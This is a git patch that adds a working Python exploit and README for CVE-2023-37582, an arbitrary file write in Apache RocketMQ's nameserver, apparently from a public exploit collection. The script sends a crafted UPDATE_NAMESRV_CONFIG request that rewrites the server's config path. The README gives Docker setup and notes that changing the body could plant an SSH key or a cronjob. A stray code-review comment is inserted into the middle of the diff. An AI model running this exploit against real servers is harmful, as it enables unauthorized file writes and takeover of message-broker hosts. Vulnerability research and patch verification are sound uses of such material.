From 29bd78f73941b39e36d38cd1653433dcf2ce588e Mon Sep 17 00:00:00 2001
From: helloexp <21156949+helloexp@users.noreply.github.com>
Date: Tue, 12 Sep 2023 08:57:05 +0800
Subject: [PATCH] add CVE-2023-37582 RocketMQ RCE
---
00-CVE_EXP/CVE-2023-37582/CVE-2023-37582.py | 76 +++++++++++++++++++++
00-CVE_EXP/CVE-2023-37582/README.md | 50 ++++++++++++++
2 files changed, 126 insertions(+)
create mode 100644 00-CVE_EXP/CVE-2023-37582/CVE-2023-37582.py
create mode 100644 00-CVE_EXP/CVE-2023-37582/README.md
diff --git a/00-CVE_EXP/CVE-2023-37582/CVE-2023-37582.py b/00-CVE_EXP/CVE-2023-37582/CVE-2023-37582.py
new file mode 100644
index 0000000..62513bc
--- /dev/null
+++ b/00-CVE_EXP/CVE-2023-37582/CVE-2023-37582.py
@@ -0,0 +1,76 @@
+import sys
+import argparse
+import socket
+import binascii
+
+
+def exploit(address, port):
+ try:
+ client_socket = socket.socket()
+ client_socket.settimeout(5) # Set socket timeout to 5 seconds
+ client_socket.connect((address, port))
+
+ # common/src/main/java/org/apache/rocketmq/common/protocol/RequestCode.java
+ # public static final int UPDATE_NAMESRV_CONFIG = 318;
+ header = '{"code":318,"flag":0,"language":"JAVA","opaque":0,"serializeTypeCurrentRPC":"JSON","version":405}'.encode(
+ 'utf-8')
+ body = 'configStorePath=/tmp/pwned\nproductEnvName=test/path\\ntest\\ntest'.encode('utf-8')
+
+ header_length = int(len(binascii.hexlify(header).decode('utf-8')) / 2)
+ header_length_hex = '00000000' + str(hex(header_length))[2:]
+ total_length = int(4 + len(binascii.hexlify(body).decode('utf-8')) / 2 + header_length)
+ total_length_hex = '00000000' + str(hex(total_length))[2:]
+ data = total_length_hex[-8:] + header_length_hex[-8:] + binascii.hexlify(header).decode(
+ 'utf-8') + binascii.hexlify(body).decode('utf-8')
+
+ client_socket.send(bytes.fromhex(data))
+ data_received = client_socket.recv(1024)
+ print(data_received)
+
+ client_socket.close()
+ except socket.timeout:
+ print(f"Connection to {address}:{port} timed out")
+
+
+def get_namesrv_config(address, port):
+ try:
+ client_socket = socket.socket()
+ client_socket.settimeout(5) # Set socket timeout to 5 seconds
+ client_socket.connect((address, port))
+
+ # common/src/main/java/org/apache/rocketmq/common/protocol/RequestCode.java
+ # public static final int GET_NAMESRV_CONFIG = 319;
+ header = '{"code":319,"flag":0,"language":"JAVA","opaque":0,"serializeTypeCurrentRPC":"JSON","version":405}'.encode(
+ 'utf-8')
+
+ header_length = int(len(binascii.hexlify(header).decode('utf-8')) / 2)
+ header_length_hex = '00000000' + str(hex(header_length))[2:]
+ total_length = int(4 + header_length)
+ total_length_hex = '00000000' + str(hex(total_length))[2:]
+ data = total_length_hex[-8:] + 
header_length_hex[-8:] + binascii.hexlify(header).decode('utf-8')
+
+ client_socket.send(bytes.fromhex(data))
+ data_received = client_socket.recv(1024)
+ print(data_received)
+
+ client_socket.close()
+ except socket.timeout:
+ print(f"Connection to {address}:{port} timed out")
+
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser(description='RocketMQ Exploit')
+ parser.add_argument('-ip', default='127.0.0.1', help='Nameserver address')
+ parser.add_argument('-p', default=9876, type=int, help='Nameserver listen port')
+
+ if len(sys.argv) == 1:
+ parser.print_help()
+ sys.exit(1)
+
+ args = parser.parse_args()
+
+ print('current nameserver config:')
+ get_namesrv_config(args.ip, args.p)
+ exploit(args.ip, args.p)
+ print('modified nameserver config:')
+ get_namesrv_config(args.ip, args.p)
diff --git a/00-CVE_EXP/CVE-2023-37582/README.md b/00-CVE_EXP/CVE-2023-37582/README.md
new file mode 100644
index 0000000..a2134ad
--- /dev/null
+++ b/00-CVE_EXP/CVE-2023-37582/README.md
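Review bot: In both `exploit` and `get_namesrv_config` the socket is released only on the success path: `client_socket.close()` is the last statement of the `try`, and the `except` handles nothing but `socket.timeout`, so a refused connection or a reset during `recv` propagates with the descriptor still open. Opening it as `with socket.socket() as client_socket:` inside the `try` closes it on every exit and makes the explicit `close()` unnecessary. The framing arithmetic also takes a detour through `binascii.hexlify(...)` only to halve the hex length, which is simply `len(header)` and `len(body)`, and the two four-byte big-endian prefixes assembled by padding and slicing hex strings are what `struct.pack('>II', total_length, header_length)` yields. Written that way, a one-line comment such as `# frame: total length, header length, JSON header, body` would document the layout the code currently expresses only through string manipulation.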
@@ -0,0 +1,50 @@
+# CVE-2023-37582_EXPLOIT
+Apache RocketMQ Arbitrary File Write Vulnerability Exploit Demo
+
+# Overview
+In fact, the Arbitrary file write vulnerability(CVE-2023-37582) in Apache RocketMQ has already been addressed in the CVE-2023-33246 RCE vulnerability.
+However, the fix provided for [CVE-2023-33246](https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT) RCE is not comprehensive as it only resolves the impact on RocketMQ's broker.
+This vulnerability affects RocketMQ's nameserver, and exploiting it allows for arbitrary file write capabilities.
+
+
+
+
+# Setup local RocketMQ environment via Docker
+```bash
+
+# start name server
+docker run -d --name rmqnamesrv -p 9876:9876 apache/rocketmq:4.9.6 sh mqnamesrv
+
+# start broker
+docker run -d --name rmqbroker \
+ --link rmqnamesrv:namesrv \
+ -e "NAMESRV_ADDR=namesrv:9876" \
+ -p 10909:10909 \
+ -p 10911:10911 \
+ -p 10912:10912 \
+ apache/rocketmq:4.9.6 sh mqbroker \
+ -c /home/rocketmq/rocketmq-4.9.6/conf/broker.conf
+
+```
+
+# Exploit
+
+It is important to note that the exploit provided is for demonstration purposes only.
+The current exploit allows for the writing of a file to the nameserver's `/tmp/pwned` directory.
+Modifying the content of the `body` variable allows for the exploitation of this vulnerability by writing an OpenSSH private key or adding a cronjob.
+However, it is crucial to remember that such activities are unauthorized and can lead to serious security breaches.
+It is strongly advised to refrain from engaging in any malicious activities and to prioritize responsible and ethical cybersecurity practices.
+
+```
+usage: CVE-2023-37582.py [-h] [-ip IP] [-p P]
+
+RocketMQ Exploit
+
+optional arguments:
+ -h, --help show this help message and exit
+ -ip IP Nameserver address
+ -p P Nameserver listen port
+```
+
+# References
+[RocketMQ commit: Fix incorrect naming](https://github.com/apache/rocketmq/pull/6843/files)